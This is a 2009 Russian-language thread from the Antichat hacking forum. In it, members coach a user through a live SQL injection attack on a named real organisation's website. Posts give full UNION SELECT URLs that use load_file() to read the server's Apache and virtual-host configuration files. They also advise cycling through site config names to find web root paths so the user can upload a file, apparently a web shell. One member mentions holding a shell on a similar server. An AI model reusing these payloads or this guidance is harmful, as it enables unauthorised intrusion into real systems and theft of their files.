HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10141  
Старый 13.11.2009, 19:39
Ins3t
Участник форума
Регистрация: 18.07.2009
Сообщений: 272
С нами: 8850336

Репутация: 330
По умолчанию

Цитата:
Сообщение от Spyder  
apekoff, смотори Document_Root, настрйки вирутальных хостов в vhosts.conf, либо в папке vhost.d, либо в extra
Вообще в конце httpd.conf должны либо быть прописаны виртуальные хосты, либо инклудится файл с ними
DocumentRoot, без нижней черты.

Цитата:
# DocumentRoot "/var/www/html"
Цитата:
# DocumentRoot /www/docs/dummy-host.example.com
Это из httpd.conf
 
Ответить с цитированием

  #10142  
Старый 13.11.2009, 19:40
apekoff
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами: 9034600

Репутация: 0
По умолчанию

[QUOTE=Ins3t]2apekoff, ищи файл httpd.conf, в нем будет прописан полный путь.

OS: RedHat:

Код:
http://www.spacefoundation.org/news/story.php?id=-1'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file('/etc/httpd/conf/httpd.conf')%20from+mysql.user--+
DocumentRoot "/var/www/html
не заливается ни в DocumentRoot "/var/www/htmlни в "/var/www/html/home/virtual/site3/fst/home/spacefoundation/111.php
 
Ответить с цитированием

  #10143  
Старый 13.11.2009, 19:41
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

в DocumentRoot обычно путь до дефолных файлов апача, где index.html c текстом It's work
Как правило реальные пути до сайтов, особенно если это хостинг, находятся в вирутальных хостах
 
Ответить с цитированием

  #10144  
Старый 13.11.2009, 19:44
apekoff
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами: 9034600

Репутация: 0
По умолчанию

что т я запутался ребята куда смотреть что писать
 
Ответить с цитированием

  #10145  
Старый 13.11.2009, 19:46
apekoff
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами: 9034600

Репутация: 0
По умолчанию

кстати это не хостинг .. там просто все как то хитро ..это какая то организация космическая на ихнем сервере около 10 сайтов космической и научной тематики просто что это за пути в /etc/passwd
----------------
вот еще в самом низу -
# Include httpd20_app.conf
Include conf/httpd20_app.conf

Последний раз редактировалось apekoff; 13.11.2009 в 19:48..
 
Ответить с цитированием

  #10146  
Старый 13.11.2009, 19:48
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

apekoff, смотри ниже в httpd.conf инклудится файл
Include conf/httpd20_app.conf
http://www.spacefoundation.org
Цитата:
/news/story.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file%2 8%27/etc/httpd/conf/httpd20_app.conf%27%29%20from+mysql.user--+
тут инклудится
/etc/httpd/conf/virtual
Судя по всему это папка в которой находятся конфиги всех сайтов

Цитата:
http://www.spacefoundation.org/news/story.php?id=-1%27+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,load_file%2 8%27/etc/httpd/conf/virtual/site1%27%29%20from+mysql.user--+
Вот конфиг для первого сайта, перебирай имена site1,site2 ...
 
Ответить с цитированием

  #10147  
Старый 13.11.2009, 19:50
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
С нами: 10309346

Репутация: 4303


По умолчанию

Кстати это хостинг, вернее какая то контора которая предоставляет выделенные сервера, у меня есть шелл на сервере с абсолютно схожими расположениями конфигов, поэто му я сейчас посмотрел какие файлы в /etc/httpd/conf/virtual =)
 
Ответить с цитированием

  #10148  
Старый 13.11.2009, 19:57
apekoff
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами: 9034600

Репутация: 0
По умолчанию

чет не могу я залить
 
Ответить с цитированием

  #10149  
Старый 13.11.2009, 20:03
Jokester
Познавший АНТИЧАТ
Регистрация: 18.02.2008
Сообщений: 1,136
С нами: 9593606

Репутация: 4915


По умолчанию

Цитата:
Сообщение от apekoff  
чет не могу я залить
И что, нужно залить и тебе дать? Всё уже тебе объяснили, просьбы о взломе запрещены
 
Ответить с цитированием

  #10150  
Старый 13.11.2009, 20:04
apekoff
Новичок
Регистрация: 12.03.2009
Сообщений: 26
С нами: 9034600

Репутация: 0
По умолчанию

Цитата:
Сообщение от jokester  
И что, нужно залить и тебе дать? Всё уже тебе объяснили, просьбы о взломе запрещены
а что я разве просил ?я спрашивал ...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.